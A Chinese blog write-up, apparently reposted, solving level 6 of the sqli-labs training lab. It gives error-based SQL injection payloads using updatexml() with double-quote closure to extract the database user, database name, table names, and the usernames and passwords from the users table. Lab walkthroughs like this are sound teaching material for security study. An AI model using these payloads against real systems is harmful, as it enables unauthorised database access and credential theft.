sqli-labs系列——第六关

时间：2021-03-15 00:22:46 阅读：40 评论：0 收藏：0 [点我收藏+]

less6

这个本质上跟第五关相同都是使用报错注入，这一关使用的是双引号闭合

还是使用updatexml()这个函数

?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

技术分享图片

爆库名：

?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

技术分享图片

爆表名：

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security‘ limit 0,1),0x7e),1) --+

技术分享图片

爆用户名：

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+

技术分享图片

爆密码：

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+

技术分享图片

sqli-labs系列——第六关

原文：https://www.cnblogs.com/messi996/p/14533832.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)